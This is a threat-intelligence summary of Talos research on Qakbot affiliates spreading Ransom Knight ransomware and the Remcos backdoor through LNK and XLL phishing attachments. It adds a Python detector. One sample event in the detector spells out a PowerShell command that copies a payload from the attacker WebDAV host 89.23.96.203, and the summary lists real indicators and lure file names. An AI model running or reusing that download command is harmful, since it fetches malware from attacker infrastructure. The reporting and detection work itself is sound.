Qakbot-affiliated actors distribute Ransom Knight malware despite infrastructure takedown

Talos reports that Qakbot-affiliated actors have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails since early August 2023, continuing despite the FBI’s late August 2023 infrastructure seizure. The operation suggests the developers remain active and may rebuild Qakbot infrastructure, with a new campaign using LNK-based downloaders and PowerShell to pull payloads from a remote host. #Qakbot #RansomKnight #Remcos #Cyclops #LNK #XLL

Keypoints

  • The Qakbot threat actors are distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor via phishing emails, starting before the FBI takedown in August 2023.
  • The FBI operation seized Qakbot infrastructure and cryptocurrency assets, but Talos notes the campaign evidence suggests the spam delivery infrastructure may have persisted while C2 access was disrupted.
  • Metadata in LNK files from the August 2023 campaign matches machines used in earlier Qakbot campaigns (AA and BB), indicating affiliates are driving the new activity.
  • Despite the takedown, the threat actors appear active and may rebuild Qakbot infrastructure; law enforcement did not arrest the operators, sustaining risk.
  • The LNKs launch PowerShell, which retrieves the next stage from a WebDAV network share on 89.23.96.203, a PowerShell-based download chain that maps to T1105.
  • Phishing emails feature Italian-language file names and ZIP archives containing an LNK and an XLL (Remcos backdoor), with the LNK loading the Ransom Knight payload from the remote host.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing via attachment, used to deliver LNK/XLL payloads in ZIP archives within phishing emails. “The filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in phishing emails…”
  • [T1204.002] User Execution: Malicious File – Execution triggered by opening/interaction with LNK files distributed inside ZIP archives. “The filenames of these LNK files… are being distributed inside Zip archives that also contain an XLL file.”
  • [T1059.001] PowerShell – PowerShell is used to download and execute the next stage of the payload. “The payload … pointed to PowerShell.exe and pass the following arguments to download the next stage: …”
  • [T1105] Ingress Tool Transfer – Downloading of a remote executable via WebDAV from a remote IP. “This method could be an attempt to bypass command line detection for downloading of a remote executable via PowerShell (T1105 Ingress Tool Transfer).”
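As an added example (not code from the Talos report), the following Python classifier tags process-creation events that match the chain described above: Explorer spawning PowerShell, which reaches out to a remote UNC/WebDAV path such as 89.23.96.203. The sample events are constructed, and the field names (`parent`, `image`, `cmdline`) are assumptions about how your EDR or Sysmon pipeline exposes them.

```python
import re

# Constructed sample process-creation events (not real telemetry). The first one
# mirrors the chain in the report: an LNK opened from Explorer spawns PowerShell,
# which fetches the next stage from the WebDAV host 89.23.96.203.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "copy \\89.23.96.203@80\share\information.exe $env:TEMP"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c net use Z: \\fileserver\docs"},
]

# Indicator taken from the report; extend with your own watchlist.
WATCHLIST_HOSTS = {"89.23.96.203"}

# UNC path, including the WebDAV forms \\host@80\share and \\host@SSL@443\share.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)(?:@SSL)?(?:@\d+)?\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.IGNORECASE)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

def remote_hosts(cmdline):
    """Return every remote host referenced as a UNC/WebDAV path or URL."""
    hosts = set(UNC_RE.findall(cmdline)) | set(URL_RE.findall(cmdline))
    return {h for h in hosts if h.lower() not in LOCAL_HOSTS}

def classify(event):
    """Tag one process-creation event with the MITRE techniques it matches."""
    techniques = set()
    image = event["image"].lower()
    parent = event["parent"].lower()
    hosts = remote_hosts(event["cmdline"])
    if image.endswith("powershell.exe"):
        techniques.add("T1059.001")
        if hosts:  # PowerShell pulling something from a remote host
            techniques.add("T1105")
    # An LNK double-click shows up as Explorer parenting the interpreter.
    lnk_like = parent.endswith("explorer.exe") and image.endswith("powershell.exe")
    return {"techniques": sorted(techniques), "hosts": sorted(hosts),
            "lnk_like": lnk_like, "watchlist_hit": bool(hosts & WATCHLIST_HOSTS)}

def alerts(events):
    """Return the events worth escalating: T1105 via PowerShell or a watchlist hit."""
    return [e for e in events
            if "T1105" in classify(e)["techniques"] or classify(e)["watchlist_hit"]]
```

Only PowerShell-originated transfers are tagged T1105 here; the `net use` event keeps its host in `hosts` so you can widen the rule to other LOLBins without changing the parser.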

Indicators of Compromise

  • [IP Address] 89.23.96.203 – used in WebDAV-based download of the next-stage payload; associated with the LNK download chain
  • [File Name] ATTENTION-Invoice-29-August.docx.lnk, NOT-paid-Invoice-26-August.pdf.lnk – LNK/Zip phishing attachments used to lure users
  • [File Name] information.exe – next-stage payload downloaded from the remote host
  • [File] Remcos backdoor XLL file – XLL inside ZIP, delivering Remcos alongside Ransom Knight

Read more: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/